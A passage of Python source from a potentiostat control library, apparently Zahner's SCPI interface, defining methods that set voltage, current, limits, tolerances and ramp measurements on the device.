potentiostat on. After the primitive it will be switched back to the previous state.
If the potentiostat was on before a primitive, for example, then it will be switched on
again after the primitive.
If the potentiostat was not on before a primitive, it takes up to 50 ms at the beginning of
the primitive, depending on the device, until the potentiostat has settled and measurement
can be started. If the potentiostat is already on at the beginning of the measurement, the
measurement starts immediately. If faster processes are to be recorded in succession in
different primitives, the potentiostat must be switched on beforehand.
:SCPI-COMMAND: :SESO:STAT <ON|OFF>
:param enable: The state. True to turn on.
:returns: The response string from the device.
:rtype: string
"""
if enable == True:
command = ":SESO:STAT ON"
else:
command = ":SESO:STAT OFF"
return self._writeCommandToInterfaceAndReadLine(command)
def _getRelationCommandParameter(self, relation: Union[RELATION, str]) -> str:
"""Get the relation command parameter.
This function returns the parameter for the relation, which must be sent as SCPI command.
:param relation: The relation OCV or ZERO.
:type relation: :class:`~zahner_potentiostat.scpi_control.control.RELATION`
:returns: The parameter string
:rtype: string
"""
if isinstance(relation, RELATION) and (
relation == RELATION.OCV or relation == RELATION.OCV.value
):
command = "OCV"
elif isinstance(relation, str) and (
"OCV" in relation.upper() or "OCP" in relation.upper()
):
command = "OCV"
else:
if isinstance(relation, RELATION) and (
relation == RELATION.ZERO or relation == RELATION.ZERO.value
):
command = "0"
elif isinstance(relation, str) and (
"0" in relation or "ZERO" in relation.upper()
):
command = "0"
else:
raise ValueError("invalid parameter `relation`")
return command
def setVoltageRelation(self, relation: Union[RELATION, str]) -> str:
"""Set the relation of the voltage parameter for simple use.
If the relation is related to OCV, :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.measureOCV` must be used to specify the OCV relation to
be used for calculating the relative voltage.
The relation is of the type :class:`~zahner_potentiostat.scpi_control.control.RELATION`.
The strings OCP OCV and the number 1 is also supported for relation to Open Circuit.
Everything else means relation to 0 V.
:SCPI-COMMAND: :SESO:UREL <OCV|0>
:param relation: The relation OCV or ZERO.
:type relation: :class:`~zahner_potentiostat.scpi_control.control.RELATION`
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(
f":SESO:UREL {self._getRelationCommandParameter(relation)}"
)
def setVoltageValue(self, value: float) -> str:
"""Set the voltage parameter for simple use.
This value should be set before switching on.
If the potentiostat is simply switched on potentiostatically without a primitive,
this voltage value is output on the potentiostat.
If :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setVoltageRelation` is selected as OCV, then this value is added to the measured OCV.
:SCPI-COMMAND: :SESO:UVAL <value>
:param value: The voltage value.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":SESO:UVAL " + str(value))
def setCurrentValue(self, value: float) -> str:
"""Set the current parameter for simple use.
This value should be set before switching on.
If the potentiostat is simply switched on galvanostatically without a primitive,
this current value is output on the galvanostat.
:SCPI-COMMAND: :SESO:IVAL <value>
:param value: The current value.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":SESO:IVAL " + str(value))
def getMACAddress(self) -> str:
"""Read MAC address from device.
Each device is assigned a MAC address from the Zahner MAC address block.
With this command the MAC address can be read.
:SCPI-COMMAND: :SYST:MAC?
:returns: The MAC address of the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":SYST:MAC?")
def setVoltageRange(self, voltage: float) -> str:
"""Set the voltage range.
This command sets the voltage range by an voltage value.
:SCPI-COMMAND: :SESO:VRNG <value>
:param voltage: voltage for which the range is to be selected.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":SESO:VRNG " + str(voltage))
def setVoltageRangeIndex(self, voltage: int) -> str:
"""Set the voltage range.
This command sets the voltage range by the range index.
Index starts at 0.
:SCPI-COMMAND: :SESO:VRNG:IDX <value>
:param voltage: voltage range index.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(
":SESO:VRNG:IDX " + str(voltage)
)
def setAutorangingEnabled(self, state: bool = True) -> str:
"""Set the autoranging state.
This does not work perfectly depending on the measurement object.
The best option is always to measure with a fixed current range without autoranging.
Autoranging is only activ in primitves.
If only the potentiostat is switched on, **NO RANGING** is performed and **NO LIMITS** are monitored.
It is recommended to measure without autoranging if you know the current that will flow.
It can be rang in all primitives. However, disturbances can be seen in the measurement
from the ringing, since disturbances occur during the shunt change.
The time for switching is up to 50 ms depending on the device.
If you start in the wrong measuring range, time passes at the beginning in which disturbances
and measuring errors are to be seen, until the correct measuring range is found.
Before starting the measurement, you can manually set a current range to accelerate until
the correct shunt is found.
:SCPI-COMMAND: :SESO:CRNG:AUTO <1|0>
:param state: The state of autoranging. True means turned on.
:returns: The response string from the device.
:rtype: string
"""
if state:
command = ":SESO:CRNG:AUTO 1"
else:
command = ":SESO:CRNG:AUTO 0"
return self._writeCommandToInterfaceAndReadLine(command)
def setInterpolationEnabled(self, state: bool = True) -> str:
"""Set the interpolation state.
When autoranging is active, disturbances in the measurement may be seen
due to the current range change of the potentiostat.
If interpolation is switched off, the disturbances are visible in the data.
If interpolation is switched on, the current points are linearly interpolated
with the current values before and after the range change.
This does not work perfectly depending on the measurement object.
The best option is always to measure with a fixed current range without autoranging.
:SCPI-COMMAND: :SESO:INTP <1|0>
:param state: The state of interpolation. True means turned on.
:returns: The response string from the device.
:rtype: string
"""
if state == True:
command = ":SESO:INTP 1"
else:
command = ":SESO:INTP 0"
return self._writeCommandToInterfaceAndReadLine(command)
def setMinimumShuntIndex(self, index: int) -> str:
"""Set the minimum shunt index.
This command sets the smallest shunt that is used.
Index starts at 0.
:SCPI-COMMAND: :SESO:CRNG:AUTO:LLIM <value>
:param current: Current range index.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(
":SESO:CRNG:AUTO:LLIM " + str(index)
)
def setMaximumShuntIndex(self, index: int) -> str:
"""Set the maximum shunt index.
This command sets the biggest shunt that is used.
Index starts at 0.
:SCPI-COMMAND: :SESO:CRNG:AUTO:ULIM <value>
:param current: Current range index.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(
":SESO:CRNG:AUTO:ULIM " + str(index)
)
def setShuntIndex(self, index: int) -> str:
"""Set the shunt index.
This command sets a shunt, via its index.
Index starts at 0.
:SCPI-COMMAND: :SESO:CRNG:IDX <value>
:param current: Current range index.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":SESO:CRNG:IDX " + str(index))
def setCurrentRange(self, current: float) -> str:
"""Set the current range.
This command sets a shunt.
The shunt is automatically selected to match the current value.
:SCPI-COMMAND: :SESO:CRNG <value>
:param current: Current for which the range is to be selected.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":SESO:CRNG " + str(current))
def setTimeParameter(self, time: Union[float, str]) -> str:
"""Set the time parameter.
This command sets the time for primitives that require a single time parameter, such as ramps.
The time can be specified as a floating point number, then it is interpreted as seconds.
The number should not be much smaller than one second.
Alternatively, the time can also be specified as a string.
Then you have s, m and min and h as time unit available.
As can be read in the class :class:`~zahner_potentiostat.scpi_control.control.SCPIDevice`,
there is a dead time at the ends of the primitive, that this does not fall into the weight,
the time should not be less than one second.
Examples:
* setTimeParameter(3.1415) Input as seconds.
* setTimeParameter("3.1415 s") Input as seconds.
* setTimeParameter("3.1415 m") Input as minutes.
* setTimeParameter("3.1415 min") Input as minutes.
* setTimeParameter("3.1415 h") Input as hours.
:SCPI-COMMAND: :PARA:TIME <value>
:param time: The time parameter. READ THE TEXT ABOVE.
:returns: The response string from the device.
:rtype: string
"""
time = self._processTimeInput(time)
return self._writeCommandToInterfaceAndReadLine(":PARA:TIME " + str(time))
def setMaximumTimeParameter(self, value: Union[float, str]) -> str:
"""Set the maximum time parameter.
Parameters for primitives that require a maximum time.
Enter the parameter as for :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setTimeParameter`.
As can be read in the class :class:`~zahner_potentiostat.scpi_control.control.SCPIDevice`,
there is a dead time at the ends of the primitive, that this does not fall into the weight,
the time should not be less than one second.
:SCPI-COMMAND: :PARA:TMAX <value>
:param time: time parameter; for valid values see `setTimeParameter`
:returns: response string from the device
:rtype: string
"""
value = self._processTimeInput(value)
return self._writeCommandToInterfaceAndReadLine(":PARA:TMAX " + str(value))
def setMinimumTimeParameter(self, value: Union[float, str]) -> str:
"""Set the minimum time parameter.
Parameters for primitives that require a minimum time.
Enter the parameter as for :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setTimeParameter`.
:SCPI-COMMAND: :PARA:TMIN <value>
:param time: time parameter; for valid values see `setTimeParameter`
:returns: The response string from the device.
:rtype: string
"""
value = self._processTimeInput(value)
return self._writeCommandToInterfaceAndReadLine(":PARA:TMIN " + str(value))
def setVoltageParameterRelation(self, relation: Union[RELATION, str]) -> str:
"""Set the relation of the voltage parameter for primitves.
If the relation is related to OCV, :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.measureOCV` must be used to specify the OCV relation to
be used for calculating the relative voltage.
The relation is of the type :class:`~zahner_potentiostat.scpi_control.control.RELATION`.
The strings OCP OCV and the number 1 is also supported for relation to Open Circuit.
Everything else means relation to 0 V.
:SCPI-COMMAND: :PARA:UREL <OCV|0>
:param relation: The relation OCV or ZERO.
:type relation: :class:`~zahner_potentiostat.scpi_control.control.RELATION`
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(
f":PARA:UREL {self._getRelationCommandParameter(relation)}"
)
def setVoltageParameter(self, value: float) -> str:
"""Set the voltage parameter for primitives.
Primitves that need an voltage parameter like ramps use this parameter.
This parameter is only used when the coupling is potentiostatic.
If :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setVoltageParameterRelation` is selected as OCV, then this value is added to the measured OCV.
:SCPI-COMMAND: :PARA:UVAL <value>
:param value: The voltage value.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":PARA:UVAL " + str(value))
def setCurrentParameter(self, value: float) -> str:
"""Set the current parameter for primitives.
Primitves that need an current parameter like ramps use this parameter.
This parameter is only used when the coupling is galvanostatic.
:SCPI-COMMAND: :PARA:IVAL <value>
:param value: The current value.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":PARA:IVAL " + str(value))
def setScanRateParameter(self, scanrate: float) -> str:
"""Set the scan rate for primitives.
Primitves that need an scan rate parameter use this parameter.
The value is interpreted as V/s or A/s depending on the selected coupling.
:SCPI-COMMAND: :PARA:SCRA <value>
:param value: The scanrate value. V/s or A/s depending on coupling as float.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":PARA:SCRA " + str(scanrate))
def setCoupling(self, coupling: Union[COUPLING, str]) -> str:
"""Set the coupling of the device.
Set the coupling to galvanostatic or potentiostatic.
The parameter coupling has to be from type :class:`~zahner_potentiostat.scpi_control.control.COUPLING` or the string "pot".
When the coupling is changed the potentiostat will be turned off.
It must be switched on again manually, with :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setPotentiostatEnabled`.
:SCPI-COMMAND: :SESO:COUP <pot|gal>
:param coupling: The coupling of the device.
:type coupling: :class:`~zahner_potentiostat.scpi_control.control.COUPLING`
:returns: The response string from the device.
:rtype: string
"""
if isinstance(coupling, str):
if "pot" in coupling:
command = ":SESO:COUP pot"
self._coupling = COUPLING.POTENTIOSTATIC
elif "gal" in coupling:
command = ":SESO:COUP gal"
self._coupling = COUPLING.GALVANOSTATIC
else:
raise ValueError("invalid parameter `coupling`")
elif isinstance(coupling, COUPLING):
if coupling == COUPLING.POTENTIOSTATIC:
command = ":SESO:COUP pot"
self._coupling = COUPLING.POTENTIOSTATIC
else:
command = ":SESO:COUP gal"
self._coupling = COUPLING.GALVANOSTATIC
else:
raise ValueError("invalid type for parameter `coupling`")
return self._writeCommandToInterfaceAndReadLine(command)
def setBandwith(self, bandwithIdx: int) -> str:
"""Set the bandwith of the device.
The bandwidth of the device is automatically set correctly, it is not recommended to change it.
:SCPI-COMMAND: :SESO:BAND <value>
:param bandwith: The bandwith as index.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(
":SESO:BAND " + str(bandwithIdx)
)
def setFilterFrequency(self, frequency: float) -> str:
"""Set the filter frequency of the device.
The filter frequency of the device is automatically set correctly, it is not recommended to change it.
:SCPI-COMMAND: :SESO:FILT <value>
:param frequency: The frequency as float value.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":SESO:FILT " + str(frequency))
def setParameterLimitCheckToleranceTime(self, time: float) -> str:
"""Setting the time for which operation outside the limits is allowed.
By default this parameter is 0.
It will be aborted at the latest at the next integer multiple of the sampling period duration.
For this time, it is allowed to exceed or fall below the functional parameter current and voltage limits.
Enter the parameter as for :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setTimeParameter`.
:SCPI-COMMAND: :PARA:UILT <value>
:param time: The time in seconds.
:returns: The response string from the device.
:rtype: string
"""
time = self._processTimeInput(time)
return self._writeCommandToInterfaceAndReadLine(":PARA:UILT " + str(time))
def setMinMaxVoltageParameterCheckEnabled(self, state: bool = True) -> str:
"""Switch voltage check on or off.
The voltage is absolute and independent of OCP/OCV.
When switched on, the voltage is checked in galvanostatic primitives, such as ramps or galvanostatic polarization.
When the limit is reached, it continues to the next primitive and the state of the device is ok and it has no error.
This can be used, for example, to apply a constant current until a voltage is reached.
This is used in the method :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.measureCharge`.
:SCPI-COMMAND: :PARA:ULIM:STAT <ON|OFF>
:param state: The state of check. True means turned on.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(
":PARA:ULIM:STAT ON" if state else ":PARA:ULIM:STAT OFF"
)
def setMinMaxCurrentParameterCheckEnabled(self, state: bool = True) -> str:
"""Switch current check on or off.
The current is absolute with sign.
When switched on, the current is checked in potentiostatic primitives, such as ramps or polarization.
When the limit is reached, it continues to the next primitive and the state of the device is
ok and it has no error.
This can be used, for example, to wait until the voltage is only as small as required (settling process).
:SCPI-COMMAND: :PARA:ILIM:STAT <ON|OFF>
:param state: The state of check. True means turned on.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(
":PARA:ILIM:STAT ON" if state else ":PARA:ILIM:STAT OFF"
)
def setMaximumVoltageParameter(self, value: float) -> str:
"""Set the maximum voltage parameter for primitives.
The voltage is absolute and independent of OCP/OCV.
If the monitoring is switched on, the primitive is successfully aborted when
the maximum voltage is exceeded or the minimum voltage is undershot.
It returns with the response ok.
:SCPI-COMMAND: :PARA:ULIM:MAX <value>
:param value: The voltage value.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":PARA:ULIM:MAX " + str(value))
def setMinimumVoltageParameter(self, value: float) -> str:
"""Set the minimum voltage parameter for primitives.
The voltage is absolute and independent of OCP/OCV.
If the monitoring is switched on, the primitive is successfully aborted when
the maximum voltage is exceeded or the minimum voltage is undershot.
It returns with the response ok.
:SCPI-COMMAND: :PARA:ULIM:MIN <value>
:param value: The voltage value.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":PARA:ULIM:MIN " + str(value))
def setMaximumCurrentParameter(self, value: float) -> str:
"""Set the maximum voltage parameter for primitives.
The current is absolute with sign.
If the monitoring is switched on, the primitive is successfully aborted when
the maximum current is exceeded or the minimum current is undershot.
It returns with the response ok.
:SCPI-COMMAND: :PARA:ILIM:MAX <value>
:param value: The current value.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":PARA:ILIM:MAX " + str(value))
def setMinimumCurrentParameter(self, value: float) -> str:
"""Set the minimum voltage parameter for primitives.
The current is absolute with sign.
If the monitoring is switched on, the primitive is successfully aborted when
the maximum current is exceeded or the minimum current is undershot.
It returns with the response ok.
:SCPI-COMMAND: :PARA:ILIM:MAX <value>
:param value: The current value.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":PARA:ILIM:MIN " + str(value))
def setGlobalLimitCheckToleranceTime(self, time: float) -> str:
"""Setting the time for which operation outside the limits is allowed.
By default this parameter is 0.
It will be aborted at the latest at the next integer multiple of the sampling period duration.
For this time, it is allowed to exceed or fall below the global current and voltage limits.
Enter the parameter as for :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setTimeParameter`.
:SCPI-COMMAND: :SESO:UILT <value>
:param state: The time in seconds.
:returns: The response string from the device.
:rtype: string
"""
time = self._processTimeInput(time)
return self._writeCommandToInterfaceAndReadLine(":SESO:UILT " + str(time))
def setGlobalVoltageCheckEnabled(self, state: bool = True) -> str:
"""Switch global voltage check on or off.
The voltage is absolute and independent of OCP/OCV.
When this is enabled, the voltage in potentiostatic and galvanostatic is checked for the global limits.
If the limits are exceeded, the potentiostat is switched off and the primitive returns an error condition.
New primitives cannot be measured until the error state of the device has been reset.
The state can be reset with :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.clearState`.
:SCPI-COMMAND: :SESO:ULIM:STAT <ON|OFF>
:param state: The state of check. True means turned on.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(
":SESO:ULIM:STAT ON" if state else ":SESO:ULIM:STAT OFF"
)
def setGlobalCurrentCheckEnabled(self, state: bool = True) -> str:
"""Switch global current check on or off.
The current is absolute with sign.
When this is enabled, the current in potentiostatic and galvanostatic is checked for the global limits.
If the limits are exceeded, the potentiostat is switched off and the primitive returns an error condition.
New primitives cannot be measured until the error state of the device has been reset.
The state can be reset with :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.clearState`.
:SCPI-COMMAND: :SESO:ILIM:STAT <ON|OFF>
:param state: The state of check. True means turned on.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(
":SESO:ILIM:STAT ON" if state else ":SESO:ILIM:STAT OFF"
)
def setMaximumVoltageGlobal(self, value: float) -> str:
"""Set the maximum voltage for the device.
The voltage is absolute and independent of OCP/OCV.
If the monitoring is switched on, the primitive is aborted when
the maximum voltage is exceeded or the minimum voltage is undershot.
:SCPI-COMMAND: :SESO:ULIM:MAX <value>
:param value: The voltage value.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":SESO:ULIM:MAX " + str(value))
def setMinimumVoltageGlobal(self, value: float) -> str:
"""Set the minimum voltage for the device.
The voltage is absolute and independent of OCP/OCV.
If the monitoring is switched on, the primitive is aborted when
the maximum voltage is exceeded or the minimum voltage is undershot.
:SCPI-COMMAND: :SESO:ULIM:MIN <value>
:param value: The voltage value.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":SESO:ULIM:MIN " + str(value))
def setMaximumCurrentGlobal(self, value: float) -> str:
"""Set the maximum current for the device.
The current is absolute with sign.
If the monitoring is switched on, the primitive is aborted when
the maximum current is exceeded or the minimum voltage is undershot.
:SCPI-COMMAND: :SESO:ILIM:MAX <value>
:param value: The current value.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":SESO:ILIM:MAX " + str(value))
def setMinimumCurrentGlobal(self, value: float) -> str:
"""Set the minimum current for the device.
The current is absolute with sign.
If the monitoring is switched on, the primitive is aborted when
the maximum current is exceeded or the minimum voltage is undershot.
:SCPI-COMMAND: :SESO:ILIM:MIN <value>
:param value: The current value.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":SESO:ILIM:MIN " + str(value))
def setSamplingFrequency(self, frequency: float) -> str:
"""Set the the sampling frequency.
This frequency is used for all primitives except IE stairs.
:SCPI-COMMAND: :SESO:SFRQ <value>
:param frequency: The sampling frequency in Hz.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":SESO:SFRQ " + str(frequency))
def setToleranceBreakEnabled(self, value: bool = True) -> str:
"""Allowing tolerance break for primitive.
The primitive potentiostatic and galvanostatic polarization or OCVScan can be aborted if the absolute change tolerance
has been fallen below. In the case of IE steps, this applies to the individual steps of the primitive.
The tolerances apply to the complementary quantity, i.e. potentiostatic to current changes
and galvanostatic to voltage changes. OCV it is related to the voltage.
The absolute tolerances are always in V/s or A/s.
The relative tolerance is a factor of 1/s.
The current change is divided by the size at the start and is therefore set in the relative
ratio of the start size at primitve start.
The tolerances are calculated according to the following formulas, where X is current or
voltage as the case requires.
Absolute Tolerance = (Xn-Xn-1)/(tn-tn-1)
Relative Tolerance = (Absolute Tolerance)/(X0)
:SCPI-COMMAND: :PARA:TOL:STAT <0|1>
:param value: The sate of tolerance break. True means enabled.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(
":PARA:TOL:STAT 1" if value else ":PARA:TOL:STAT 0"
)
def setAbsoluteTolerance(self, value: float) -> str:
"""Set the absolute tolerance.
Documentation is with the method :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setToleranceBreakEnabled`.
:SCPI-COMMAND: :PARA:TOL:ABS <value>
:param value: The value of absolute tolerance in V/s or A/s.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":PARA:TOL:ABS " + str(value))
def setRelativeTolerance(self, value: float) -> str:
"""Set the relative tolerance.
Documentation is with the method :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setToleranceBreakEnabled`.
:SCPI-COMMAND: :PARA:TOL:REL <value>
:param value: The value of relative tolerance in 1/s.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":PARA:TOL:REL " + str(value))
def setChargeBreakEnabled(self, value: bool = True) -> str:
"""Allowing charge break for primitive.
With primitive potentiostatic and galvanostatic polarization, you can set an upper charge limit and a lower
charge limit. These are absolute signed values.
For each primitive these values count separately and for each primitive the charge starts at 0.
If you want to know the charge, the current must be integrated manually.
:SCPI-COMMAND: :PARA:CHAR:STAT <0|1>
:param value: The sate of charge break. True means enabled.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(
":PARA:CHAR:STAT 1" if value else ":PARA:CHAR:STAT 0"
)
def setMaximumCharge(self, value: float) -> str:
"""Set the maximum charge parameter for primitives.
If the monitoring is switched on, the primitive is successfully aborted when
the maximum charge is exceeded or the minimum charge is undershot.
It returns with the response ok.
:SCPI-COMMAND: :PARA:CHAR:MAX <value>
:param value: The charge value.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":PARA:CHAR:MAX " + str(value))
def setMinimumCharge(self, value: float) -> str:
"""Set the minimum charge parameter for primitives.
If the monitoring is switched on, the primitive is successfully aborted when
the maximum charge is exceeded or the minimum charge is undershot.
It returns with the response ok.
:SCPI-COMMAND: :PARA:CHAR:MIN <value>
:param value: The charge value.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":PARA:CHAR:MIN " + str(value))
def getTemperature(self) -> float:
"""Read temperatur from the connected thermoelement.
For this command, a thermocouple must be connected to the back of the device.
Otherwise an exception is thrown because the response string contains the text
that no temperature sensor is connected.
This is used to query the temperature. A recording of the temperature during measurements
is not yet supported.
:SCPI-COMMAND: :MEAS:TEMP?
:returns: The measured temperature in degree celsius.
:rtype: float
"""
return self._writeCommandToInterfaceAndReadValue(":MEAS:TEMP?")
def setStepSize(self, value: float) -> str:
"""Set the step size for primitives.
This parameter is used only by the IEStairs.
It can be the step size in V for potentiostatic stairs or in A for galvanostatic stairs.
:SCPI-COMMAND: :PARA:STEP <value>
:param value: The step size in V or A.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":PARA:STEP " + str(value))
def measureRampValueInTime(
self,
targetValue: Optional[float] = None,
duration: Optional[float] = None,
) -> str:
"""Measuring a ramp with a target value in a duration.
Potentiostatic or galvanostatic ramps are possible. With these ramps, the device selects the
step size as small as possible.
Before starting the ramp, a setpoint must always be specified, at which the ramp then starts.
It is not necessary to switch on the potentiostat, it is sufficient to set a voltage value
with the method :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setVoltageValue`
or a current value with the method :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setCurrentValue`,
depending on whether the ramp is galvanostatic or potentiostatic. Alternatively, the ramp
starts from the final value of the last executed pimitive.
However, if the last primitive had a different coupling, a new value must be specified.
Within the duration the targetValue is then driven.
If targetValue is not specified, the value from the last method call of :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setVoltageParameter`
or :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setCurrentParameter` is used, depending on how the coupling was set when the call was made.
The same applies to duration there the value of the method :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setTimeParameter` is used.
The ramp can be aborted with the minimum or maximum values.
In addition to the dead time at the end of the ramp, as with all primitives, there are a few
milliseconds at the beginning of the ramp that are needed to initialize the ramp, this is not
necessary with POGA for example.
Used setup methods/parameters:
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setCoupling`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setVoltageParameterRelation`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setVoltageParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setCurrentParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setTimeParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinMaxVoltageParameterCheckEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinMaxCurrentParameterCheckEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMaximumVoltageParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinimumVoltageParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMaximumCurrentParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinimumCurrentParameter`
:SCPI-COMMAND: :MEAS:RMPT?
:param targetValue: The target targetValue or None to use the old parameter.
:param duration: The duration of the ramp or None to use the old time parameter.
:returns: The response string from the device.
:rtype: string
"""
if duration != None:
self.setTimeParameter(duration)
if targetValue != None:
if self._coupling == COUPLING.GALVANOSTATIC:
self.setCurrentParameter(targetValue)
else:
self.setVoltageParameter(targetValue)
return self._writeCommandToInterfaceAndReadLine(":MEAS:RMPT?")
def measureRampValueInScanRate(
self,
targetValue: Optional[float] = None,
scanrate: Optional[float] = None,
) -> str:
"""Measuring a ramp to a target value with a scanrate.
Potentiostatic or galvanostatic ramps are possible. With these ramps, the device selects the
step size as small as possible.
Before starting the ramp, a setpoint must always be specified, at which the ramp then starts.
It is not necessary to switch on the potentiostat, it is sufficient to set a voltage value
with the method :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setVoltageValue`
or a current value with the method :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setCurrentValue`,
depending on whether the ramp is galvanostatic or potentiostatic. Alternatively, the ramp
starts from the final value of the last executed pimitive.
However, if the last primitive had a different coupling, a new value must be specified.
If targetValue is not specified, the targetValue from the last method call of :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setVoltageParameter`
or :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setCurrentParameter` is used, depending on how the coupling was set when the call was made.
The same applies to scanrate there the last value of the method :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setScanRateParameter` is used.
The absolute value of the scan rate is used. The unit is in V/s or A/s depending on whether
the command is called galvanostatically or potentiostatically.
The ramp can be aborted with the minimum or maximum values.
In addition to the dead time at the end of the ramp, as with all primitives, there are a few
milliseconds at the beginning of the ramp that are needed to initialize the ramp, this is not
necessary with POGA for example.
Used setup methods/parameters:
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setCoupling`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setVoltageParameterRelation`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setVoltageParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setCurrentParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setScanRateParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinMaxVoltageParameterCheckEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinMaxCurrentParameterCheckEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMaximumVoltageParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinimumVoltageParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMaximumCurrentParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinimumCurrentParameter`
:SCPI-COMMAND: :MEAS:RMPS?
:param targetValue: The target targetValue or None to use the old parameter.
:param scanrate: The scanrate to the target value.
:returns: The response string from the device.
:rtype: string
"""
if scanrate != None:
self.setScanRateParameter(scanrate)
if targetValue != None:
if self._coupling == COUPLING.GALVANOSTATIC:
self.setCurrentParameter(targetValue)
else:
self.setVoltageParameter(targetValue)
return self._writeCommandToInterfaceAndReadLine(":MEAS:RMPS?")
def measureRampScanRateForTime(
self,
scanrate: Optional[float] = None,
time: Optional[float] = None,
) -> str:
"""Measuring with a scanrate for a time.
Potentiostatic or galvanostatic ramps are possible. With these ramps,
the device selects the step size as small as possible.
Before starting the ramp, a setpoint must always be specified, at which the ramp then starts.
It is not necessary to switch on the potentiostat, it is sufficient to set a voltage value
with the method :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setVoltageValue`
or a current value with the method :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setCurrentValue`,
